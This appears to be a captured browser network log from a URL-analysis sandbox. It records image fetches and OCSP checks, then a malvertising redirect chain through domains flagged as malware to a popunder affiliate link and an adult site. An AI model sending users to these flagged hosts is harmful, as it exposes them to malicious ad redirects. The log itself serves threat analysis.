x-amz-apigw-id: U0BWXH-HoAMFhkg=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-62c4af5b-51c7abd54a523a1f479a7d5b;Sampled=0
x-amzn-remapped-date: Tue, 05 Jul 2022 21:38:35 GMT
x-amz-cf-pop: SEA19-C1, SEA73-P1
x-cache: Miss from cloudfront
x-amz-cf-id: _-zkK-6DIfDVDzXmTOTigF2tM4pfh19MReGO_X26eRhLNFGL3Jc9Aw==
via: 1.1 4c48e9fb20d53d40e9fe273dbdae1098.cloudfront.net (CloudFront), 1.1 2ab6211e66998c8b58132661a7e3cade.cloudfront.net (CloudFront), 1.1 google
date: Tue, 05 Jul 2022 21:50:29 GMT
age: 49197
etag: "604b4cc5d50ca494df1de2ab8baa486da20d1e4e"
content-type: image/jpeg
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   12165
Md5:    29949330f4dc3b69747d5534e745fde3
Sha1:   604b4cc5d50ca494df1de2ab8baa486da20d1e4e
Sha256: b98faa2080573124f84254a2f87df3631f257e9a040cf34ebe267a1784d4b954
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F3138a2a5-6ce8-4465-8dff-7307ebdd802f.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
                                        
server: nginx
content-length: 13276
x-amzn-requestid: 33881d12-a991-437c-90a2-4c00d31642b8
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: UUXHsFwoIAMFqkg=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-62b80564-15ff67dd1eee173c5730daf4;Sampled=0
x-amzn-remapped-date: Sun, 26 Jun 2022 07:06:12 GMT
x-amz-cf-pop: SEA73-P1
x-cache: Miss from cloudfront
x-amz-cf-id: jqKUpQrSzmKObwwVi8gqnNdDGPhy70oWIIQ8xtK_1BXQIBhTdB1mow==
via: 1.1 1352c0a623ff0601dd16439f3f225f70.cloudfront.net (CloudFront), 1.1 0d4ebcaa87ba94709def0eaac9371e5a.cloudfront.net (CloudFront), 1.1 google
date: Wed, 06 Jul 2022 04:37:49 GMT
age: 24757
etag: "7e5a550bbbac49269cae75ce9bb92e8fdf77b086"
content-type: image/jpeg
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   13276
Md5:    95aa230a6b516a252f3815c586803c15
Sha1:   7e5a550bbbac49269cae75ce9bb92e8fdf77b086
Sha256: fc3c49de063a4e13c64e799664fa6c7ccf6e42aac5973aaf1af2b7689338f3b9
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F0a269baa-7158-4db8-9b1d-e4e22ec22920.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
                                        
server: nginx
content-length: 6711
x-amzn-requestid: 5b99a31c-9224-4862-a43f-544d6fa3dbdd
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: U0BHsEkmIAMFg_Q=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-62c4aefd-571078525a01c4dc72c6ed22;Sampled=0
x-amzn-remapped-date: Tue, 05 Jul 2022 21:37:01 GMT
x-amz-cf-pop: SEA19-C1, SEA73-P1
x-cache: Miss from cloudfront
x-amz-cf-id: 8xhNMjh4EBZQrViDk4PaxV5Tk_sBuZ1BGRuVGtAVAGie72R16hmoAA==
via: 1.1 b23fb37cd7fff033ab21e3284f558a28.cloudfront.net (CloudFront), 1.1 b36bf2c460ac693ce304817aed073112.cloudfront.net (CloudFront), 1.1 google
date: Tue, 05 Jul 2022 21:37:02 GMT
etag: "b06f33b2742c3c6de4a449f4227d85e6268bafce"
content-type: image/jpeg
age: 50004
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   6711
Md5:    d82ae97bb9569fa288a23c3380a4f4ef
Sha1:   b06f33b2742c3c6de4a449f4227d85e6268bafce
Sha256: e99961f561aaa3ded5fd1c19ce10505a7d016d5d67bbbef5caebad09ba233b56
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fabd9505b-43dd-4a15-95da-d320727bc76c.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
                                        
server: nginx
content-length: 7381
x-amzn-requestid: 7d7f3d3b-e16a-48bd-8df6-62e2eed518db
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: UyBSIE-KIAMFegQ=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-62c3e273-4aac4b85691586656b440662;Sampled=0
x-amzn-remapped-date: Tue, 05 Jul 2022 07:04:19 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Miss from cloudfront
x-amz-cf-id: CtNsdh8vzxJbzRp4jLjErhYOyBIN8P2JOoLNgXPlVZ9N-6BJKDNRXQ==
via: 1.1 4dde8ec6d6c12741888c2d3a059d4a2e.cloudfront.net (CloudFront), 1.1 ebe4011a81a36e2bf678f69ce1711330.cloudfront.net (CloudFront), 1.1 google
date: Tue, 05 Jul 2022 14:24:32 GMT
age: 75954
etag: "0e711cdffbe58041b6567ff9475af3820529038f"
content-type: image/jpeg
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   7381
Md5:    a419e897adcc5361b4b5000e3f5cef87
Sha1:   0e711cdffbe58041b6567ff9475af3820529038f
Sha256: 8e0c6cecaaf6701faa8b1c2d0a925102074e5ef35b697a3f8e44c0ee75415d40
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F6bb6c586-bb86-4a54-bd48-f2b5da763e74.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
                                        
server: nginx
content-length: 7117
x-amzn-requestid: 7cfe344b-f098-4260-bb50-6574786e6ee2
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: U0BW8HnbIAMFkrA=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-62c4af5f-14a960ac060d2d120cb0ad7c;Sampled=0
x-amzn-remapped-date: Tue, 05 Jul 2022 21:38:39 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: 0F6ZVkqKywgjh9Qa1DJw_-rdOLcc1tzEll0J58NeawksoIu9nY1a-g==
via: 1.1 a20e81b65d2465c729ce2f6bfe539dd0.cloudfront.net (CloudFront), 1.1 cd64decb1403270c914848213601a674.cloudfront.net (CloudFront), 1.1 google
date: Tue, 05 Jul 2022 21:52:41 GMT
age: 49065
etag: "01efbdf6b2ab79332bf6a22d36472e294732aa17"
content-type: image/jpeg
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   7117
Md5:    b4ead2bdcbc998a5685d65a26e40ce1a
Sha1:   01efbdf6b2ab79332bf6a22d36472e294732aa17
Sha256: 04399a91345db4f89bdbbb9ddb30db0f2a0c29654491b38bb1a30bd40c4f3e48
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fa84f597b-27f5-4aa5-a416-9b7af03690c1.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
                                        
server: nginx
content-length: 5579
x-amzn-requestid: 1dd88ff3-004d-4979-9b03-c67dd1674eed
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: UyBktHjloAMFyag=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-62c3e2ea-774b45f11971772d475320bf;Sampled=0
x-amzn-remapped-date: Tue, 05 Jul 2022 07:06:18 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: dxvi0GoFSQVY4quJX-Ysh562fakCJnUT2ioGl3UUCYfcz-SdRNv_QA==
via: 1.1 6ba2a21321beeef65404429d0a4b6380.cloudfront.net (CloudFront), 1.1 ee330666adf9f04c8c30094f8ddcd004.cloudfront.net (CloudFront), 1.1 google
date: Wed, 06 Jul 2022 06:30:15 GMT
age: 18011
etag: "88adaa91cabcf87f2b679e051c1da464cb297c00"
content-type: image/jpeg
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   5579
Md5:    2ef62ce237842260bf38afba9e210e79
Sha1:   88adaa91cabcf87f2b679e051c1da464cb297c00
Sha256: e00daace4e4d73799343aee18cbc8c64735221636908b8760bbc52a4d84353b0
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "5613906E6F4774B30D44DFB00743812035C1C9FAB6F213A59782784A66745CEA"
Last-Modified: Tue, 05 Jul 2022 22:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=16943
Expires: Wed, 06 Jul 2022 16:12:50 GMT
Date: Wed, 06 Jul 2022 11:30:27 GMT
Connection: keep-alive

                                        
                                            GET /back.php?sid=6856&pid=9954&cid=347853 HTTP/1.1 
Host: find.greengoplatform.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://buyzionpark.com/
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site

                                         
                                         101.99.95.147
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
Server: nginx
Date: Wed, 06 Jul 2022 11:30:27 GMT
Content-Length: 438
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document text\012- exported SGML document, ASCII text, with CRLF line terminators
Size:   438
Md5:    367e6d8aa304997ada4b026ee48c7001
Sha1:   eb049795cf52965844d118267ea32a04494a05fb
Sha256: ab2b4c07d745efe9fa4bfc21f18e744d8b94fe55a61011cd09a7300dc6be567f
                                        
                                            GET /bb3wV.0rPO3EpFvHbWmAVTJRZTD/0Y0xN/DTcV4VOlThcA0KLvTiQV0FNrzeg/5oNXzRU- HTTP/1.1 
Host: duhestyce.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://find.greengoplatform.com/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site

                                         
                                         88.85.94.246
HTTP/2 302 Found
                                        
server: nginx
date: Wed, 06 Jul 2022 11:30:27 GMT
content-type: text/html;charset=UTF-8
content-length: 0
expires: Mon, 26 Jul 2011 05:00:00 GMT
cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
pragma: no-cache
accept-ch: Sec-CH-UA-Platform-Version, Sec-CH-UA-Platform
location: https://duhestyce.com/bK3LV.0MP_3OJPyQaRW-QT9UOVWWU_zYYZWaRbh-OdGeFfkgY_2iYj2kNlj-Yn3oZpDql_isOtTuIv2-Yx2yUz4AO_GCMD4EZFD-MHwIZJTKU_mMcNnONPy-YRzS1TvUd_XWQXmYcZ0-lbkcPdTeQ_0gNhzigj5-NlzmQnmod_HqZrysPtT-Avmwexmy9_uAZBUClDk-PFTGQHxIN_jKQLyMMNT-UP
referrer-policy: no-referrer
x-frame-options: DENY
x-content-type-options: nosniff
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  
Size:   0
Md5:    d41d8cd98f00b204e9800998ecf8427e
Sha1:   da39a3ee5e6b4b0d3255bfef95601890afd80709
Sha256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /bK3LV.0MP_3OJPyQaRW-QT9UOVWWU_zYYZWaRbh-OdGeFfkgY_2iYj2kNlj-Yn3oZpDql_isOtTuIv2-Yx2yUz4AO_GCMD4EZFD-MHwIZJTKU_mMcNnONPy-YRzS1TvUd_XWQXmYcZ0-lbkcPdTeQ_0gNhzigj5-NlzmQnmod_HqZrysPtT-Avmwexmy9_uAZBUClDk-PFTGQHxIN_jKQLyMMNT-UP HTTP/1.1 
Host: duhestyce.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         88.85.94.246
HTTP/2 302 Found
                                        
server: nginx
date: Wed, 06 Jul 2022 11:30:27 GMT
content-type: text/html;charset=UTF-8
content-length: 0
cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
pragma: no-cache
accept-ch: Sec-CH-UA-Platform-Version, Sec-CH-UA-Platform
expires: Mon, 26 Jul 2011 05:00:00 GMT
referrer-policy: no-referrer
location: https://duhestyce.com/bN3OV_0.PQ3RJSyTa-WVQW9XOYW_UazbYcWdR-hfOgGhFik_Yk2lYm2nN-jpYq3rZsD_luivOwTxI-2zYA2BUC4_OEGFMG4HZ-DJMKwLZMT_UOmPcQnRN-yTYUzV1Wv_dYXZQambc-0dlekfPgT_QixjNkjlQ-ynMoTpUqm_cs0tlukvM-zx1yuzbA1_9ChDZEHFM-mHdIHJZKy_PMTNAOmPe-mR9SuTZUU_lWkXPYTZE-wbNczdce
x-content-type-options: nosniff
X-Firefox-Spdy: h2

                                        
                                            GET /aff_c?offer_id=8000&aff_id=4013&url_id=0&aff_sub5=popunder-clickunder&aff_sub=jlke15z3d0s4bv5p9wz0&aff_sub2=DZCIHGZ6R HTTP/1.1 
Host: go.trklinkcm.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site

                                         
                                         172.255.248.105
HTTP/1.1 302 Found
Content-Type: text/html; charset=utf-8
                                        
Server: nginx
Date: Wed, 06 Jul 2022 11:30:27 GMT
Content-Length: 258
Connection: keep-alive
X-DNS-Prefetch-Control: off
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=15552000; includeSubDomains
X-Download-Options: noopen
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Set-Cookie: test=; Path=/; Expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: 8000=37_4013_8000_f510768889f57977d167c8d1e518271f; Domain=go.trklinkcm.com; Path=/; Expires=Fri, 05 Aug 2022 11:30:27 GMT
Set-Cookie: op_8000=0; Domain=go.trklinkcm.com; Path=/; Expires=Fri, 05 Aug 2022 11:30:27 GMT
Set-Cookie: user_id=01e8cb4e-9e63-4bb2-b981-3fc73ee58122_d01518705bd1e577c6ac98608e0877da; Domain=go.trklinkcm.com; Path=/; Expires=Mon, 05 Jul 2027 11:30:27 GMT; Secure; SameSite=None
Location: https://fuck-fantasy.com/jpt/?pub_id=4013&cid=37_4013_8000_f510768889f57977d167c8d1e518271f&source=
Vary: Accept
Cache-Control: no-store, no-cache


--- Additional Info ---
Magic:  HTML document, ASCII text, with no line terminators
Size:   258
Md5:    9fd6009eef871978d355a4f5cc365446
Sha1:   227f1e6efcd6f7746751d86411f592c28ca557ad
Sha256: c4f8481d80d8ca93eb7ca000aaba02f9cce89448e51d036fc40b6cfe2b64ab66
                                        
                                            GET /jquery-2.2.4.min.js HTTP/1.1 
Host: code.jquery.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://fuck-fantasy.com
Connection: keep-alive
Referer: https://fuck-fantasy.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         69.16.175.42
HTTP/2 200 OK
                                        
date: Wed, 06 Jul 2022 11:30:28 GMT
content-encoding: gzip
content-length: 29811
content-type: application/javascript; charset=utf-8
last-modified: Fri, 20 Aug 2021 17:47:53 GMT
accept-ranges: bytes
server: nginx
etag: W/"611feac9-14e4a"
cache-control: max-age=315360000, public
access-control-allow-origin: *
vary: Accept-Encoding
x-hw: 1657107028.dop020.sk1.t,1657107028.cds069.sk1.hn,1657107028.cds214.sk1.c
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (32065)
Size:   29811
Md5:    82885772205f23cd59e25a221521b059
Sha1:   96ed36f45544295f28df1ab251e7e38faceeff0e
Sha256: 8e85465daae15b31a1837a4112cf920c1eeec7a5c189595651b3a53cb9b97215
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Wed, 06 Jul 2022 11:30:28 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Wed, 06 Jul 2022 11:30:28 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Wed, 06 Jul 2022 11:30:28 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /s/archivoblack/v17/HTxqL289NzCGg4MzN6KJ7eW6CYyF_g.woff2 HTTP/1.1 
Host: fonts.gstatic.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: https://fuck-fantasy.com
Connection: keep-alive
Referer: https://fonts.googleapis.com/
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         142.250.74.163
HTTP/2 200 OK
                                        
accept-ranges: bytes
access-control-allow-origin: *
content-security-policy-report-only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin; report-to="apps-themes"
report-to: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
timing-allow-origin: *
content-length: 18604
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Wed, 06 Jul 2022 06:19:45 GMT
expires: Thu, 06 Jul 2023 06:19:45 GMT
cache-control: public, max-age=31536000
age: 18643
last-modified: Tue, 19 Apr 2022 19:33:53 GMT
content-type: font/woff2
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  data
Size:   22284
Md5:    31ff2750d30b0161ffb2bc20f27b221c
Sha1:   3a118df1394384e5fe4e04105d80c0d315f7774d
Sha256: 88d11b6b1b1c86aa44e45be9caf77b4f8bdd4ad786f99c2cc77f096b5beb8303
                                        
                                            GET /css2?family=Archivo+Black&family=Secular+One&family=Signika+Negative&display=swap HTTP/1.1 
Host: fonts.googleapis.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://fuck-fantasy.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         142.250.74.10
HTTP/2 200 OK
                                        
content-type: text/css; charset=utf-8
access-control-allow-origin: *
timing-allow-origin: *
link: <https://fonts.gstatic.com>; rel=preconnect; crossorigin
strict-transport-security: max-age=31536000
expires: Wed, 06 Jul 2022 11:30:28 GMT
date: Wed, 06 Jul 2022 11:30:28 GMT
cache-control: private, max-age=86400
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin-allow-popups
content-encoding: gzip
server: ESF
x-xss-protection: 0
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  data
Size:   2523045
Md5:    3eb0076d3e8b46bb0fc6a08bd7e7625f
Sha1:   55fcd0785ef2446859c7dd28bb35cb1ff7deef67
Sha256: 0813f66e6151f41c08131510125a89c985c195cded103af315569fb9430cf3d9
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Wed, 06 Jul 2022 11:30:28 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            POST / HTTP/1.1 
Host: ocsp.sca1b.amazontrust.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         54.230.245.118
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Content-Length: 471
Connection: keep-alive
Accept-Ranges: bytes
Cache-Control: 'max-age=158059'
Date: Wed, 06 Jul 2022 11:30:28 GMT
Last-Modified: Wed, 06 Jul 2022 10:10:37 GMT
Server: ECS (bsa/EB23)
X-Cache: Miss from cloudfront
Via: 1.1 227a1815a1677b9cf6dd587e443000b8.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: OSL50-P1
X-Amz-Cf-Id: Ale1rZXnF3g5-LtkzjqTxDq97g3OKVrAyvPMJrrb0N14uXcaTTJGqg==
Age: 4791

                                        
                                            POST / HTTP/1.1 
Host: ocsp.sca1b.amazontrust.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         54.230.245.118
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Content-Length: 471
Connection: keep-alive
Accept-Ranges: bytes
Cache-Control: 'max-age=158059'
